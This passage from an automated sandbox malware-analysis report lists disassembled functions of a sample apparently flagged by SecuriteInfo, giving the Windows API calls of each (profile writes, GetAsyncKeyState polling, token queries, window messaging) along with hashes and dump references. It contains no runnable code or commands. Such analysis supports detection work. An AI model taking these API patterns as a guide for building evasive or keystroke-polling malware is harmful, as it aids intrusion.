                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    • Opcode ID: 2fa6e8c22776f257273f61f42dc8c98bb2c18f8045085979164469b3fef24e26
                    • Instruction ID: 5298be584c57eb96508ad3ba6e6b19dbc4bed1be9ff7c612d421183656d564fd
                    • Opcode Fuzzy Hash: 2fa6e8c22776f257273f61f42dc8c98bb2c18f8045085979164469b3fef24e26
                    • Instruction Fuzzy Hash: 5D511775A00609DFCB10EF68C898DADB7F4FF58310B14C0AAE916AB311DB79AD45CB91
                    Function 007BE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007BE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007BE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007BE8F2
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007BE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007BE91F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: b17215e7ba2f66d90e6eddf14a7ba5fdac27b0bc3d37fc34661a576e353d4e44
                    • Instruction ID: 9baa7aa712e1f5ab50a2e96d7b297d6b92576b964b73e3dc509a0d5b046914ca
                    • Opcode Fuzzy Hash: b17215e7ba2f66d90e6eddf14a7ba5fdac27b0bc3d37fc34661a576e353d4e44
                    • Instruction Fuzzy Hash: 4A511A35A00209DFCF01EF64C985AADBBF5EF48315B188099E90AAB361CB75ED15CB51
                    Function 007DA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c8f5db0251ea08f79fa8c3ceb75750801907de4f34abcf92238544389cf34ce1
                    • Instruction ID: e21295da74353e62ddc0f395dc34b9d2d71e3159bd0d918c1441d9727716c229
                    • Opcode Fuzzy Hash: c8f5db0251ea08f79fa8c3ceb75750801907de4f34abcf92238544389cf34ce1
                    • Instruction Fuzzy Hash: 4241D335901144BFC710DB28CC48FA9BBBAFB09310F194266F856A73E1D778AE51DA61
                    Function 00752344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00752357
                    • ScreenToClient.USER32(008167B0,?), ref: 00752374
                    • GetAsyncKeyState.USER32(00000001), ref: 00752399
                    • GetAsyncKeyState.USER32(00000002), ref: 007523A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: 8e6dcbd9db607256147e83c22cad744282a79491491ea5013d05ad943d67ed58
                    • Instruction ID: 2613066543cfb9554d06db7bad243e8bd2c11c416693ee502b5979184d694890
                    • Opcode Fuzzy Hash: 8e6dcbd9db607256147e83c22cad744282a79491491ea5013d05ad943d67ed58
                    • Instruction Fuzzy Hash: AC418F31504119FBDF169F68C848AE9BB74FB06321F20436AF929922A1C7789D58DFA1
                    Function 007A6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 007A69A9
                    • TranslateMessage.USER32(?), ref: 007A69D2
                    • DispatchMessageW.USER32(?), ref: 007A69DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A69EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: fe1838ec772c73f711505edec85ef1510210a55d4ac30ce646982a2c637b41d7
                    • Instruction ID: 48a7775469d26e9c6de02f562c0b0df1d5147b81c5a8fa385db5c6b07cd902ce
                    • Opcode Fuzzy Hash: fe1838ec772c73f711505edec85ef1510210a55d4ac30ce646982a2c637b41d7
                    • Instruction Fuzzy Hash: E731C271900246AADB208F749C48BF77BACBF43304F18C769E462D20A1E739E899D790
                    Function 007A8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 007A8F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 007A8FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007A8FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 007A8FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007A8FDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: 578fc7e1048e0022a4909809315b610002f3026e4e340cf0d72d9b58489796de
                    • Instruction ID: c390d3158692a353bf5aeaff9da5451fe0bf9ba1aaf151b0c862c60e3f74b19a
                    • Opcode Fuzzy Hash: 578fc7e1048e0022a4909809315b610002f3026e4e340cf0d72d9b58489796de
                    • Instruction Fuzzy Hash: 8E31E07150021AEFDF00CF68D94CA9E7BB6FB45315F10822AF925EA2D0C7B89910CB91
                    Function 007AB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindowVisible.USER32(?), ref: 007AB6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AB6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AB71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007AB742
                    • _wcsstr.LIBCMT ref: 007AB74C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: 956c1e1ffa72e565677ac5dd9f270f549fc28d1e42dc13bb44a825edb1de2637
                    • Instruction ID: 0e137467bfcb212486eda73b8f0f5f3b96fe6b03f3023b01a4c9a5f72b5a980c
                    • Opcode Fuzzy Hash: 956c1e1ffa72e565677ac5dd9f270f549fc28d1e42dc13bb44a825edb1de2637
                    • Instruction Fuzzy Hash: F221FC31205204FBEB155B399C49E7B7BA8DF8A750F00813AFC09CA1A2EFA9DC409750
                    Function 007DB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • GetWindowLongW.USER32(?,000000F0), ref: 007DB44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007DB471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007DB489
                    • GetSystemMetrics.USER32(00000004), ref: 007DB4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007C1184,00000000), ref: 007DB4D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: 303b8e7df0e91bf1ea4fef2973a347a974e98cd071402d4d37792f97ba719ae7
                    • Instruction ID: ce64183522481371679227ed7d2cb30083d85ea53f82f6094201bd9d98635a2a
                    • Opcode Fuzzy Hash: 303b8e7df0e91bf1ea4fef2973a347a974e98cd071402d4d37792f97ba719ae7
                    • Instruction Fuzzy Hash: 16217171610295EFCB10DF389C04A6A37B4FB05721F16873AF966D62E1E7349821DB90
                    Function 007A97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007A9802
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9834
                    • __itow.LIBCMT ref: 007A984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9874
                    • __itow.LIBCMT ref: 007A9885
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: c6ce652eaa56046bbf09cb09fef7ad6841c2ba385f490adfafa6a04f2f28f015
                    • Instruction ID: b9672a5e091d15f4c1fde5e1bf261297fd07c1ef437a501b88e54dbfb3993e14
                    • Opcode Fuzzy Hash: c6ce652eaa56046bbf09cb09fef7ad6841c2ba385f490adfafa6a04f2f28f015
                    • Instruction Fuzzy Hash: D021F531B01208EBDB109A659C8AEEE3BB8EF8AB11F044025FE05DB281D67C8D55D7D2
                    Function 007512F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                    • SelectObject.GDI32(?,00000000), ref: 0075135C
                    • BeginPath.GDI32(?), ref: 00751373
                    • SelectObject.GDI32(?,00000000), ref: 0075139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 1227f8c00d89740d9168d98f7d466f6fd35d1a3e76b5478eb7b14b4df33862fe
                    • Instruction ID: 4ed28b97b76e7a13d2c184f092a6f4ee1e91bd0e1fcb3e152eb123a7500e1eef
                    • Opcode Fuzzy Hash: 1227f8c00d89740d9168d98f7d466f6fd35d1a3e76b5478eb7b14b4df33862fe
                    • Instruction Fuzzy Hash: E8213D70801208EFDB119F29EC087E97BBDFB00323F54C236F851965A0E7B999A5DB90
                    Function 007AC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 839f81c2acb095bf305f0f473c08d2b838dfb5ceec0261b523f69cdf7a5b89fe
                    • Instruction ID: d3b1bb3cdd719f0facd5922c27054841b5851c2ef731d4699eef1fd237a1f7af
                    • Opcode Fuzzy Hash: 839f81c2acb095bf305f0f473c08d2b838dfb5ceec0261b523f69cdf7a5b89fe
                    • Instruction Fuzzy Hash: 0501D6F170520DBBD605AA25CD46E6B639D9BA6394B448110FD04D6243EE5CAE11C3A1
                    Function 007B4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 007B4D5C
                    • __beginthreadex.LIBCMT ref: 007B4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 007B4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007B4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007B4DAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 3a919c1ac0fcb54d9999d27786901a8ba616c0c74082f8714aa547693b2bbf84
                    • Instruction ID: dcd40a493acf34f8ca65b149b854d04eb51835321ebd93f1eb8c68515f4aaf37
                    • Opcode Fuzzy Hash: 3a919c1ac0fcb54d9999d27786901a8ba616c0c74082f8714aa547693b2bbf84
                    • Instruction Fuzzy Hash: 601108B2A05208BFC7119BA8DC08BEA7FACFF45320F188266F955D3251D6798D0087A1
                    Function 007A874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                    • GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                    • GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                    • HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: b1b23c8b84d4aabcd2372918aa69ffd44ebc693a37a32c2e204188b90ab6fbfd
                    • Instruction ID: 9008e9ea7edbc7f41aa2993f201c3ddb79e67e4b3c70861dcab94b976bd8bcc9
                    • Opcode Fuzzy Hash: b1b23c8b84d4aabcd2372918aa69ffd44ebc693a37a32c2e204188b90ab6fbfd
                    • Instruction Fuzzy Hash: 70011271601204FFDB105FA5DC48D67BF7DFF86755720457AF84AC6160DA359D00CA61
                    Function 007B54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: 05c265378fd5870b7b9e58fae65d383626ef1f94cbed2c8a30a7a3354f5e7eb6
                    • Instruction ID: 4bc73bc5d148a7e638ae45a998cd98605161da5ddc25f8c79da3733e182064aa
                    • Opcode Fuzzy Hash: 05c265378fd5870b7b9e58fae65d383626ef1f94cbed2c8a30a7a3354f5e7eb6
                    • Instruction Fuzzy Hash: 71013971D01A1DDBCF10EFE8E8487EDBB79BF09712F004156E802B2140DB395560C7A5
                    Function 007A7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                    Download Yara Rule
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?,?,007A799D), ref: 007A766F
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A768A
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A7698
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?), ref: 007A76A8
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A76B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 8e2733e7d3bfbba8d71c29c832468dfc3680dcc81aae59badff29f10facab42e
                    • Instruction ID: bab3d55c45605aaec1b12eae9f5c899eb35611f759c831c1550cb0c1785001ba
                    • Opcode Fuzzy Hash: 8e2733e7d3bfbba8d71c29c832468dfc3680dcc81aae59badff29f10facab42e
                    • Instruction Fuzzy Hash: 740184B2601604BBDB145F58DC44BAA7BFDEB85761F148129FD05D3211E739DE40E7A0
                    Function 007A85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A8608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A8612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A8621
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A8628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A863E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                    • Instruction ID: 0a0d0d43b3f212de7b95f964db5fc45b5b0400c4b261596f759dd76f3e79a666
                    • Opcode Fuzzy Hash: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                    • Instruction Fuzzy Hash: 88F06D31202204AFEB101FA5DD8DE6B3BBCEF8A754B08852AF94AC7151CB799C41DA65
                    Function 007A8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8669
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A8673
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8682
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A869F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
